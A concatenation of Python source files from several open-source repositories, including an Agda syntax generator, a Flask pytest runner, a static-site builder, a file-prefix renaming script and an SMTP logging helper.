ls = [l.rstrip() for l in fp.read().splitlines() if l and not l.strip().startswith('--')]
has_ty, has_tm, has_th = [kw in ls for kw in ["type", "term", "theory"]]
# Collect type signature lines
print("Collecting type signature lines")
ty_lines = []
if has_ty:
ty_pos = ls.index("type")
for l in ls[ty_pos+1:]:
if not re.search("^\s+.*$", l):
break
ty_lines.append(l.strip())
# Collect term signature lines
print("Collecting term signature lines")
tm_lines = []
if has_tm:
tm_pos = ls.index("term")
for l in ls[tm_pos+1:]:
if not re.search("^\s+.*$", l):
break
tm_lines.append(l.strip())
# Collect equation and property lines
print("Equation and property lines")
eq_lines = []
prop_lines = []
if has_th:
th_pos = ls.index("theory")
for l in ls[th_pos+1:]:
if not re.search("^\s+.*$", l):
break
# Handle line breaks
if not (l.strip().startswith("{") or l.strip().startswith("(") or l.strip().startswith("'")):
prev_l = eq_lines.pop()
eq_lines.append(prev_l + " " + l.strip())
elif l.strip().startswith("'"):
prop_lines.append(l.strip())
else:
eq_lines.append(l.strip())
# Parsing type operators
print("Parsing type operators")
ty_ops = []
derived = False
for l in ty_lines:
if l[0] == "{" and l[-1] == "}":
derived = True
l = l[1:-1]
nm, sig = splitstrip(l, ':')
if '|' in sig:
ar, fix = splitstrip(sig, '|')
else:
ar, fix = sig[0], None
ty_ops.append(TyOp(nm, int(ar[0]), fix, derived))
# Parsing term operators
print("Parsing term operators")
tm_ops = []
derived = False
for l in tm_lines:
if l[0] == "{" and l[-1] == "}":
derived = True
l = l[1:-1]
if '|' in l:
sig, props = splitstrip(l, '|')
sym, *fix = props.split()
else:
sig = l
sym, fix = None, None
tm_ops.append(op(sig, sym, fix[0] if fix else None, derived))
# Extract signature name
print("Extracting signature name")
if "|" in ls[0]:
m = re.search("^syntax ([^ ]*) *\| *([^ ]*)", ls[0])
syn_name = m.group(1)
tm_name = m.group(2)
else:
m = re.search("^syntax ([^ ]*)", ls[0])
syn_name = m.group(1)
tm_name = m.group(1)
ty_name = tm_name + "T"
if "extends" in ls[0]: # Syntax extends another file
print("Syntax extends another file")
if ls[0].strip().endswith('extends'): # Extension with modification
ext_list = []
i = 1
while i < len(ls):
l = ls[i].strip()
if l.startswith("- "):
ext_list.append(ls[i])
elif l != "type" and l != "term" and l != "theory":
# Handle line breaks
prev_l = ext_list.pop()
ext_list.append(prev_l + l)
else: break
i += 1
mod_syns = []
for ext in ext_list:
m = re.search('\s*-\s+([^ ]+)(?:\s*\(([^)]*)\))?', ext)
f, mods = m.groups()
# Recursively read base syntax files
syn = read_syn(PurePath(dirname,f))
# Apply modifiers
if mods:
if "using" in mods and "hiding" in mods:
raise Exception("The 'hiding' and 'using' modifiers are not allowed together.")
mod_dict = parse_mods(mods)
if 'hiding' in mod_dict:
syn.hide_tokens(mod_dict['hiding'])
elif 'using' in mod_dict:
syn.keep_tokens(mod_dict['using'])
if 'deriving' in mod_dict:
syn.derive_tokens(mod_dict['deriving'])
if 'fixity' in mod_dict:
syn.change_fixity(mod_dict['fixity'])
if 'renaming' in mod_dict:
syn.rename_tokens(mod_dict['renaming'])
if 'renaming_sym' in mod_dict:
syn.rename_sym_in_tokens(mod_dict['renaming_sym'])
mod_syns.append(syn)
base_syn = combine_syntax_list(mod_syns)
else: # Extension without modification
print("Extension without modification")
m = re.search("extends (.*)$", ls[0])
files = splitstrip(m.group(1), ",")
base_syns = [read_syn(PurePath(dirname,f)) for f in files]
base_syn = combine_syntax_list(base_syns)
ops = {op.name : op.sym for op in base_syn.tm_sig.all_ops + tm_ops}
ext_syn = Syntax(syn_name,
TypeSignature(ty_name, *ty_ops) if has_ty else Unsorted(),
TermSignature(tm_name, *tm_ops),
Theory.mk(prop_lines, eq_lines, ops))
return combine_syntaxes(base_syn, ext_syn, syn_name, tm_name)
else: # No extension
print("No extension")
ops = {op.name : op.sym for op in tm_ops}
return Syntax(syn_name,
TypeSignature(ty_name, *ty_ops) if has_ty else Unsorted(),
TermSignature(tm_name, *tm_ops),
Theory.mk(prop_lines, eq_lines, ops))
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(prog="soas", description='Produce an Agda formalisation from a syntax description file')
arg_parser.add_argument("Syntax", metavar="path",type=Path, help="path to syntax file")
arg_parser.add_argument("-o", "--out", type=Path, action="store", help="output folder for generated Agda modules")
args = arg_parser.parse_args()
syntax = read_syn(args.Syntax)
syntax.render_agda(args.out)
print(syntax.syn_name + " syntax generated successfully.")
``` |
{
"source": "joeyespo/flask-pytest",
"score": 2
} |
#### File: flask-pytest/flask_pytest/__init__.py
```python
from __future__ import print_function
import os
from multiprocessing import Process
import pytest
__version__ = '0.0.5'
BEEP_CHARACTER = '\a'
def bool_config(app, setting, default=None):
value = app.config.get(setting)
return (default
if value is None else
str(app.config.get(setting)).lower() == 'true')
def run_tests_sync(beep=True, exitfirst=True, quiet=True, *extra_args):
argv = []
if exitfirst:
argv += ['--exitfirst']
if quiet:
argv += ['--quiet']
if extra_args:
argv += extra_args
exit_code = pytest.main(argv)
if exit_code != 0 and beep:
print(BEEP_CHARACTER, end='')
def start_tests(beep=True, exitfirst=True, quiet=True, *extra_args):
print('Running tests...')
p = Process(target=run_tests_sync, name='background-pytest',
args=(beep, exitfirst, quiet) + extra_args)
p.daemon = True
p.start()
def FlaskPytest(app, *extra_args):
inner_run = app.run
def run_app(*args, **kwargs):
if (app.debug and os.environ.get('WERKZEUG_RUN_MAIN') and
bool_config(app, 'FLASK_PYTEST_ENABLED', True)):
start_tests(
bool_config(app, 'FLASK_PYTEST_BEEP', True),
bool_config(app, 'FLASK_PYTEST_EXITFIRST', True),
bool_config(app, 'FLASK_PYTEST_QUIET', True),
*extra_args)
return inner_run(*args, **kwargs)
# Override the built-in run method and return the app
app.run = run_app
return app
``` |
{
"source": "joeyespo/gitpress",
"score": 3
} |
#### File: gitpress/gitpress/building.py
```python
import os
from .repository import require_repo, presentation_files
from .helpers import copy_files, remove_directory
default_out_directory = '_site'
def build(content_directory=None, out_directory=None):
"""Builds the site from its content and presentation repository."""
content_directory = content_directory or '.'
out_directory = os.path.abspath(out_directory or default_out_directory)
repo = require_repo(content_directory)
# Prevent user mistakes
if out_directory == '.':
raise ValueError('Output directory must be different than the source directory: ' + repr(out_directory))
if os.path.basename(os.path.relpath(out_directory, content_directory)) == '..':
raise ValueError('Output directory must not contain the source directory: ' + repr(out_directory))
# TODO: read config
# TODO: use virtualenv
# TODO: init and run plugins
# TODO: process with active theme
# Collect and copy static files
files = presentation_files(repo)
remove_directory(out_directory)
copy_files(files, out_directory, repo)
return out_directory
```
#### File: gitpress/gitpress/previewing.py
```python
import os
import SocketServer
import SimpleHTTPServer
from .building import build
def preview(directory=None, host=None, port=None, watch=True):
"""Runs a local server to preview the working directory of a repository."""
directory = directory or '.'
host = host or '127.0.0.1'
port = port or 5000
# TODO: admin interface
# TODO: use cache_only to keep from modifying output directly
out_directory = build(directory)
# Serve generated site
os.chdir(out_directory)
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer((host, port), Handler)
print ' * Serving on http://%s:%s/' % (host, port)
httpd.serve_forever()
``` |
{
"source": "joeyespo/nosey",
"score": 2
} |
#### File: nosey/nosey/command.py
```python
import sys
from docopt import docopt
from .watcher import watch
from . import __version__
def main(argv=None):
"""The entry point of the application."""
if argv is None:
argv = sys.argv[1:]
usage = '\n\n\n'.join(__doc__.split('\n\n\n')[1:])
version = 'Nosey ' + __version__
# Parse options
args = docopt(usage, argv=argv, version=version)
# Execute
return watch(args['<directory>'], args['--clear'])
``` |
{
"source": "joeyespo/prefix",
"score": 4
} |
#### File: joeyespo/prefix/prepend.py
```python
import os
import sys
def prepend(prefix, ext):
cwd = os.getcwd()
for filename in os.listdir(cwd):
if os.path.splitext(filename)[1] != ext:
continue
newname = prefix + filename
try:
os.rename(filename, newname)
except Exception as ex:
print ' *** ', ex
continue
print filename, '->', newname
def main():
if len(sys.argv) <= 2:
print 'usage: pre <filename-prefix> <extension>'
return 1
prepend(sys.argv[1], sys.argv[2])
return 0
if __name__ == '__main__':
main()
``` |
{
"source": "joeyespo/tabhouse.org",
"score": 3
} |
#### File: joeyespo/tabhouse.org/helper.py
```python
import os
import logging
from logging.handlers import SMTPHandler
from flask import url_for, current_app
def try_parse_int(s, default_value=None):
"""Parse an integer or return a default value if it cannot be done or the string is None."""
try:
return int(s) if s is not None else default_value
except ValueError:
return default_value
def add_jinja_helpers(app):
"""Adds helper globals to jinja."""
# Static file helpers
app.jinja_env.globals.update(static_for=static_for)
def static_for(filename, endpoint='.static'):
"""Provides the 'static' function that also appends the file's timestamp to the URL, usable in a template."""
return url_for(endpoint, filename=filename) + '?' + str(int(os.path.getmtime(os.path.join(current_app.static_folder, filename))))
def email_errors(app, email_info=None, error_level=logging.ERROR):
"""Enables error reporting using SMTP for the provided app."""
if not email_info:
email_info = app.config.get('ERROR_EMAIL_INFO')
if not email_info:
return
mailhost, from_address, to_addresses, subject, credentials = email_info
mail_handler = TlsSMTPHandler(mailhost, from_address, to_addresses, subject, credentials)
if error_level:
mail_handler.setLevel(error_level)
app.logger.addHandler(mail_handler)
class TlsSMTPHandler(SMTPHandler):
"""A TLS implementation of SMTPHandler."""
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
import string
try:
from email.utils import formatdate
except ImportError:
formatdate = self.date_time
port = self.mailport or smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (self.fromaddr, string.join(self.toaddrs, ","), self.getSubject(record), formatdate(), msg)
# --- Begin TLS support ---
if self.username:
smtp.ehlo()
smtp.starttls()
smtp.ehlo()
smtp.login(self.username, self.password)
# --- End TLS support ---
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
``` |
{
"source": "JoeyforJoy/b2x",
"score": 3
} |
#### File: JoeyforJoy/b2x/bag2sync_img2.py
```python
import os
from os import system
import argparse
def parse_args():
parser = argparse.ArgumentParser(description="Transfer rosbag to images.")
parser.add_argument("bag_file", type=str, help = "the path of bag file")
parser.add_argument("topic_img1", type=str, help = "the name of the image1 topic")
parser.add_argument("topic_img2", type=str, help = "the name of the image2 topic")
parser.add_argument("--output_dir", type=str, default="./data/synchronized",
help = "the root directory of the output files")
parser.add_argument("--img1_dir_label", type=str, default="pcd",
help = "the subdirectory name of output pcds")
parser.add_argument("--img2_dir_label", type=str, default="image",
help = "the subdirectory name of output images")
parser.add_argument("--tot", type=float, default=0.01,
help = "the tolerence of time synchronization")
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
if not os.path.exists("./devel/setup.bash"):
print("ERROR. './devel/setup.bash' must exist")
exit()
system("roscore&")
system(". ./devel/setup.sh; \
rosrun b2x time_sync_cam2.py %s %s --output_dir %s --tot %s \
--img1_dir_label %s --img2_dir_label %s &" %
(args.topic_img1, args.topic_img2, args.output_dir, args.tot, \
args.img1_dir_label, args.img2_dir_label))
system("rosbag play %s" % (args.bag_file))
system("killall rosbag; killall roscore; sleep 1;")
``` |
{
"source": "joeyfreund/dagster",
"score": 2
} |
#### File: examples/airflow_ingest/repo.py
```python
from dagster_airflow.dagster_pipeline_factory import make_dagster_pipeline_from_airflow_dag
from dagster import repository
from .airflow_complex_dag import complex_dag
from .airflow_simple_dag import simple_dag
airflow_simple_dag = make_dagster_pipeline_from_airflow_dag(simple_dag)
airflow_complex_dag = make_dagster_pipeline_from_airflow_dag(complex_dag)
@repository
def airflow_ingest_example():
return [airflow_complex_dag, airflow_simple_dag]
```
#### File: examples/emr_pyspark/repo.py
```python
from dagster_aws.emr import emr_pyspark_step_launcher
from dagster_aws.s3 import s3_plus_default_storage_defs, s3_resource
from dagster_pyspark import DataFrame as DagsterPySparkDataFrame
from dagster_pyspark import pyspark_resource
from pyspark.sql import DataFrame, Row
from pyspark.sql.types import IntegerType, StringType, StructField, StructType
from dagster import (
ModeDefinition,
PresetDefinition,
make_python_type_usable_as_dagster_type,
pipeline,
repository,
solid,
)
from dagster.core.definitions.no_step_launcher import no_step_launcher
# Make pyspark.sql.DataFrame map to dagster_pyspark.DataFrame
make_python_type_usable_as_dagster_type(python_type=DataFrame, dagster_type=DagsterPySparkDataFrame)
@solid(required_resource_keys={'pyspark', 'pyspark_step_launcher'})
def make_people(context) -> DataFrame:
schema = StructType([StructField('name', StringType()), StructField('age', IntegerType())])
rows = [Row(name='Thom', age=51), Row(name='Jonny', age=48), Row(name='Nigel', age=49)]
return context.resources.pyspark.spark_session.createDataFrame(rows, schema)
@solid(required_resource_keys={'pyspark_step_launcher'})
def filter_over_50(_, people: DataFrame) -> DataFrame:
return people.filter(people['age'] > 50)
@solid(required_resource_keys={'pyspark_step_launcher'})
def count_people(_, people: DataFrame) -> int:
return people.count()
emr_mode = ModeDefinition(
name='emr',
resource_defs={
'pyspark_step_launcher': emr_pyspark_step_launcher,
'pyspark': pyspark_resource,
's3': s3_resource,
},
system_storage_defs=s3_plus_default_storage_defs,
)
emr_preset = PresetDefinition.from_pkg_resources(
name='emr',
mode='emr',
pkg_resource_defs=[('emr_pyspark', 'prod_resources.yaml'), ('emr_pyspark', 's3_storage.yaml')],
)
local_mode = ModeDefinition(
name='local',
resource_defs={'pyspark_step_launcher': no_step_launcher, 'pyspark': pyspark_resource},
)
@pipeline(
mode_defs=[emr_mode, local_mode], preset_defs=[emr_preset],
)
def my_pipeline():
count_people(filter_over_50(make_people()))
@repository
def emr_pyspark_example():
return [my_pipeline]
```
#### File: dagster_examples/gcp_data_platform/simple_pipeline.py
```python
import datetime
import os
from dagster_gcp.bigquery.resources import bigquery_resource
from dagster_gcp.dataproc.resources import DataprocResource
from google.cloud.bigquery.job import LoadJobConfig, QueryJobConfig
from dagster import InputDefinition, ModeDefinition, Nothing, pipeline, solid
PROJECT_ID = os.getenv('GCP_PROJECT_ID')
DEPLOY_BUCKET_PREFIX = os.getenv('GCP_DEPLOY_BUCKET_PREFIX')
INPUT_BUCKET = os.getenv('GCP_INPUT_BUCKET')
OUTPUT_BUCKET = os.getenv('GCP_OUTPUT_BUCKET')
REGION = 'us-west1'
LATEST_JAR_HASH = '214f4bff2eccb4e9c08578d96bd329409b7111c8'
DATAPROC_CLUSTER_CONFIG = {
'projectId': PROJECT_ID,
'clusterName': 'gcp-data-platform',
'region': 'us-west1',
'cluster_config': {
'masterConfig': {'machineTypeUri': 'n1-highmem-4'},
'workerConfig': {'numInstances': 0},
'softwareConfig': {
'properties': {
# Create a single-node cluster
# This needs to be the string "true" when
# serialized, not a boolean true
'dataproc:dataproc.allow.zero.workers': 'true'
}
},
},
}
@solid
def create_dataproc_cluster(_):
DataprocResource(DATAPROC_CLUSTER_CONFIG).create_cluster()
@solid(config_schema={'date': str}, input_defs=[InputDefinition('start', Nothing)])
def data_proc_spark_operator(context):
dt = datetime.datetime.strptime(context.solid_config['date'], "%Y-%m-%d")
cluster_resource = DataprocResource(DATAPROC_CLUSTER_CONFIG)
job_config = {
'job': {
'placement': {'clusterName': 'gcp-data-platform'},
'reference': {'projectId': PROJECT_ID},
'sparkJob': {
'args': [
'--gcs-input-bucket',
INPUT_BUCKET,
'--gcs-output-bucket',
OUTPUT_BUCKET,
'--date',
dt.strftime('%Y-%m-%d'),
],
'mainClass': 'io.dagster.events.EventPipeline',
'jarFileUris': [
'%s/events-assembly-%s.jar' % (DEPLOY_BUCKET_PREFIX, LATEST_JAR_HASH)
],
},
},
'projectId': PROJECT_ID,
'region': REGION,
}
job = cluster_resource.submit_job(job_config)
job_id = job['reference']['jobId']
cluster_resource.wait_for_job(job_id)
@solid(input_defs=[InputDefinition('start', Nothing)])
def delete_dataproc_cluster(_):
DataprocResource(DATAPROC_CLUSTER_CONFIG).delete_cluster()
@solid(
config_schema={'date': str},
input_defs=[InputDefinition('start', Nothing)],
required_resource_keys={'bigquery'},
)
def gcs_to_bigquery(context):
dt = datetime.datetime.strptime(context.solid_config['date'], "%Y-%m-%d")
bq = context.resources.bigquery
destination = '{project_id}.events.events${date}'.format(
project_id=PROJECT_ID, date=dt.strftime('%Y%m%d')
)
load_job_config = LoadJobConfig(
source_format='PARQUET',
create_disposition='CREATE_IF_NEEDED',
write_disposition='WRITE_TRUNCATE',
)
source_uris = [
'gs://{bucket}/{date}/*.parquet'.format(bucket=OUTPUT_BUCKET, date=dt.strftime('%Y/%m/%d'))
]
bq.load_table_from_uri(source_uris, destination, job_config=load_job_config).result()
@solid(input_defs=[InputDefinition('start', Nothing)],)
def explore_visits_by_hour(context):
bq = context.resources.bigquery
query_job_config = QueryJobConfig(
destination='%s.aggregations.explore_visits_per_hour' % PROJECT_ID,
create_disposition='CREATE_IF_NEEDED',
write_disposition='WRITE_TRUNCATE',
)
sql = '''
SELECT FORMAT_DATETIME("%F %H:00:00", DATETIME(TIMESTAMP_SECONDS(CAST(timestamp AS INT64)))) AS ts,
COUNT(1) AS num_visits
FROM events.events
WHERE url = '/explore'
GROUP BY ts
ORDER BY ts ASC
'''
bq.query(sql, job_config=query_job_config)
@pipeline(mode_defs=[ModeDefinition(resource_defs={'bigquery': bigquery_resource})])
def gcp_data_platform():
dataproc_job = delete_dataproc_cluster(data_proc_spark_operator(create_dataproc_cluster()))
events_in_bq = gcs_to_bigquery(dataproc_job)
explore_visits_by_hour(events_in_bq)
```
#### File: dagster_examples/toys/stdout_spew.py
```python
import os
import sys
import time
from datetime import datetime
from dagster import (
InputDefinition,
ModeDefinition,
Output,
OutputDefinition,
String,
pipeline,
solid,
)
from dagster.core.definitions.executor import default_executors
NUM_LOOP = 120
REP_INTERVAL = 0.5
@solid(output_defs=[OutputDefinition(String, 'out_1'), OutputDefinition(String, 'out_2')])
def spawn(_):
yield Output('A', 'out_1')
yield Output('B', 'out_2')
@solid(input_defs=[InputDefinition('name', String)])
def spew(_, name):
i = 0
while i < NUM_LOOP:
print('{} {} OUT {}: {}'.format(os.getpid(), name, i, datetime.now()), file=sys.stdout)
print('{} {} ERROR {}: {}'.format(os.getpid(), name, i, datetime.now()), file=sys.stderr)
time.sleep(REP_INTERVAL)
i += 1
@pipeline(
description='Demo pipeline that streams out logs to the compute logs stdout/stderr.',
mode_defs=[ModeDefinition(executor_defs=default_executors)],
)
def stdout_spew_pipeline():
out_1, out_2 = spawn()
spew(name=out_1)
spew(name=out_2)
```
#### File: dagster_tests/api_tests/api_tests_repo.py
```python
import string
from dagster import (
InputDefinition,
Int,
OutputDefinition,
PartitionSetDefinition,
ScheduleDefinition,
lambda_solid,
pipeline,
repository,
solid,
usable_as_dagster_type,
)
@lambda_solid
def do_something():
return 1
@lambda_solid
def do_input(x):
return x
@pipeline(name='foo')
def foo_pipeline():
do_input(do_something())
@pipeline(name='baz', description='Not much tbh')
def baz_pipeline():
do_input()
def define_foo_pipeline():
return foo_pipeline
@pipeline(name="bar")
def bar_pipeline():
@usable_as_dagster_type(name='InputTypeWithoutHydration')
class InputTypeWithoutHydration(int):
pass
@solid(output_defs=[OutputDefinition(InputTypeWithoutHydration)])
def one(_):
return 1
@solid(
input_defs=[InputDefinition('some_input', InputTypeWithoutHydration)],
output_defs=[OutputDefinition(Int)],
)
def fail_subset(_, some_input):
return some_input
return fail_subset(one())
def define_bar_schedules():
return {
'foo_schedule': ScheduleDefinition(
"foo_schedule", cron_schedule="* * * * *", pipeline_name="test_pipeline", run_config={},
)
}
def error_partition_fn():
raise Exception('womp womp')
def error_partition_config_fn():
raise Exception('womp womp')
def error_partition_tags_fn(_partition):
raise Exception('womp womp')
def define_baz_partitions():
return {
'baz_partitions': PartitionSetDefinition(
name='baz_partitions',
pipeline_name='baz',
partition_fn=lambda: string.ascii_lowercase,
run_config_fn_for_partition=lambda partition: {
'solids': {'do_input': {'inputs': {'x': {'value': partition.value}}}}
},
tags_fn_for_partition=lambda _partition: {'foo': 'bar'},
),
'error_partitions': PartitionSetDefinition(
name='error_partitions',
pipeline_name='baz',
partition_fn=error_partition_fn,
run_config_fn_for_partition=lambda partition: {},
),
'error_partition_config': PartitionSetDefinition(
name='error_partition_config',
pipeline_name='baz',
partition_fn=lambda: string.ascii_lowercase,
run_config_fn_for_partition=error_partition_config_fn,
),
'error_partition_tags': PartitionSetDefinition(
name='error_partition_tags',
pipeline_name='baz',
partition_fn=lambda: string.ascii_lowercase,
run_config_fn_for_partition=lambda partition: {},
tags_fn_for_partition=error_partition_tags_fn,
),
}
@repository
def bar_repo():
return {
'pipelines': {
'foo': define_foo_pipeline,
'bar': lambda: bar_pipeline,
'baz': lambda: baz_pipeline,
},
'schedules': define_bar_schedules(),
'partition_sets': define_baz_partitions(),
}
```
#### File: dagster-graphql/dagster_graphql_tests/test_cli.py
```python
import json
import os
import time
from contextlib import contextmanager
from click.testing import CliRunner
from dagster_graphql.cli import ui
from dagster import (
InputDefinition,
Int,
OutputDefinition,
ScheduleDefinition,
lambda_solid,
pipeline,
repository,
seven,
)
from dagster.core.instance import DagsterInstance
from dagster.core.storage.pipeline_run import PipelineRunStatus
from dagster.utils import file_relative_path
@contextmanager
def dagster_cli_runner():
with seven.TemporaryDirectory() as dagster_home_temp:
yield CliRunner(env={'DAGSTER_HOME': dagster_home_temp})
@lambda_solid(input_defs=[InputDefinition('num', Int)], output_def=OutputDefinition(Int))
def add_one(num):
return num + 1
@lambda_solid(input_defs=[InputDefinition('num', Int)], output_def=OutputDefinition(Int))
def mult_two(num):
return num * 2
@pipeline
def math():
mult_two(add_one())
def define_schedules():
math_hourly_schedule = ScheduleDefinition(
name="math_hourly_schedule",
cron_schedule="0 0 * * *",
pipeline_name="math",
run_config={'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
)
return [math_hourly_schedule]
@repository
def test():
return [math] + define_schedules()
def test_basic_introspection():
query = '{ __schema { types { name } } }'
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(ui, ['-w', workspace_path, '-t', query])
assert result.exit_code == 0
result_data = json.loads(result.output)
assert result_data['data']
def test_basic_repositories():
query = '{ repositoriesOrError { ... on RepositoryConnection { nodes { name } } } }'
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(ui, ['-w', workspace_path, '-t', query])
assert result.exit_code == 0
result_data = json.loads(result.output)
assert result_data['data']['repositoriesOrError']['nodes']
def test_basic_variables():
query = '''
query FooBar($pipelineName: String! $repositoryName: String! $repositoryLocationName: String!){
pipelineOrError(params:{pipelineName: $pipelineName repositoryName: $repositoryName repositoryLocationName: $repositoryLocationName})
{ ... on Pipeline { name } }
}
'''
variables = '{"pipelineName": "math", "repositoryName": "test", "repositoryLocationName": "<<in_process>>"}'
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(ui, ['-w', workspace_path, '-v', variables, '-t', query])
assert result.exit_code == 0
result_data = json.loads(result.output)
assert result_data['data']['pipelineOrError']['name'] == 'math'
LAUNCH_PIPELINE_EXECUTION_QUERY = '''
mutation ($executionParams: ExecutionParams!) {
launchPipelineExecution(executionParams: $executionParams) {
__typename
... on LaunchPipelineRunSuccess {
run {
runId
pipeline { ...on PipelineReference { name } }
}
}
... on PipelineConfigValidationInvalid {
pipelineName
errors { message }
}
... on PipelineNotFoundError {
pipelineName
}
... on PythonError {
message
stack
}
}
}
'''
def test_start_execution_text():
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
'pipelineName': 'math',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(
ui, ['-w', workspace_path, '-v', variables, '-t', LAUNCH_PIPELINE_EXECUTION_QUERY]
)
assert result.exit_code == 0
try:
result_data = json.loads(result.output.strip('\n').split('\n')[-1])
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
except Exception as e:
raise Exception('Failed with {} Exception: {}'.format(result.output, e))
def test_start_execution_file():
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'pipelineName': 'math',
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(
ui,
[
'-w',
workspace_path,
'-v',
variables,
'--file',
file_relative_path(__file__, './execute.graphql'),
],
)
assert result.exit_code == 0
result_data = json.loads(result.output.strip('\n').split('\n')[-1])
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
def test_start_execution_save_output():
'''
Test that the --output flag saves the GraphQL response to the specified file
'''
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
'pipelineName': 'math',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
with seven.TemporaryDirectory() as temp_dir:
file_name = os.path.join(temp_dir, 'output_file')
result = runner.invoke(
ui,
[
'-w',
workspace_path,
'-v',
variables,
'--file',
file_relative_path(__file__, './execute.graphql'),
'--output',
file_name,
],
)
assert result.exit_code == 0
assert os.path.isfile(file_name)
with open(file_name, 'r') as f:
lines = f.readlines()
result_data = json.loads(lines[-1])
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
def test_start_execution_predefined():
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
'pipelineName': 'math',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(
ui, ['-w', workspace_path, '-v', variables, '-p', 'launchPipelineExecution']
)
assert result.exit_code == 0
result_data = json.loads(result.output.strip('\n').split('\n')[-1])
if not result_data.get('data'):
raise Exception(result_data)
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
def test_logs_in_start_execution_predefined():
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
'pipelineName': 'math',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with seven.TemporaryDirectory() as temp_dir:
instance = DagsterInstance.local_temp(temp_dir)
runner = CliRunner(env={'DAGSTER_HOME': temp_dir})
result = runner.invoke(
ui, ['-w', workspace_path, '-v', variables, '-p', 'launchPipelineExecution']
)
assert result.exit_code == 0
result_data = json.loads(result.output.strip('\n').split('\n')[-1])
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
run_id = result_data['data']['launchPipelineExecution']['run']['runId']
# allow FS events to flush
retries = 5
while retries != 0 and not _is_done(instance, run_id):
time.sleep(0.333)
retries -= 1
# assert that the watching run storage captured the run correctly from the other process
run = instance.get_run_by_id(run_id)
assert run.status == PipelineRunStatus.SUCCESS
def _is_done(instance, run_id):
return instance.has_run(run_id) and instance.get_run_by_id(run_id).is_finished
```
#### File: dagstermill/dagstermill_tests/test_context.py
```python
from dagstermill.manager import MANAGER_FOR_NOTEBOOK_INSTANCE
from dagster import SolidDefinition
from dagster.core.definitions.dependency import Solid
from dagster.core.system_config.objects import EnvironmentConfig
BARE_OUT_OF_PIPELINE_CONTEXT = MANAGER_FOR_NOTEBOOK_INSTANCE.get_context()
def test_tags():
context = BARE_OUT_OF_PIPELINE_CONTEXT
assert not context.has_tag('foo')
assert context.get_tag('foo') is None
def test_run_id():
assert BARE_OUT_OF_PIPELINE_CONTEXT.run_id is not None
assert BARE_OUT_OF_PIPELINE_CONTEXT.pipeline_run.run_id == BARE_OUT_OF_PIPELINE_CONTEXT.run_id
def test_run_config():
assert BARE_OUT_OF_PIPELINE_CONTEXT.run_config == {'loggers': {'dagstermill': {}}}
def test_logging_tags():
assert BARE_OUT_OF_PIPELINE_CONTEXT.logging_tags['pipeline'] == 'ephemeral_dagstermill_pipeline'
def test_environment_config():
assert isinstance(BARE_OUT_OF_PIPELINE_CONTEXT.environment_config, EnvironmentConfig)
def test_pipeline_def():
assert BARE_OUT_OF_PIPELINE_CONTEXT.pipeline_def.name == 'ephemeral_dagstermill_pipeline'
assert len(BARE_OUT_OF_PIPELINE_CONTEXT.pipeline_def.solids) == 1
assert BARE_OUT_OF_PIPELINE_CONTEXT.pipeline_def.solids[0].name == 'this_solid'
def test_resources():
assert isinstance(BARE_OUT_OF_PIPELINE_CONTEXT.resources, tuple)
def test_solid_def():
assert isinstance(BARE_OUT_OF_PIPELINE_CONTEXT.solid_def, SolidDefinition)
def test_solid():
assert isinstance(BARE_OUT_OF_PIPELINE_CONTEXT.solid, Solid)
def test_log(capsys):
BARE_OUT_OF_PIPELINE_CONTEXT.log.info('Ho ho!')
assert 'Ho ho!' in capsys.readouterr().err
``` |
{
"source": "JoeyFTribbiani/Beta-TicTacToe",
"score": 3
} |
#### File: JoeyFTribbiani/Beta-TicTacToe/model.py
```python
import numpy as np
import collections
class UCT_Model_Node(object):
def __init__(self, w, n):
self.win = w
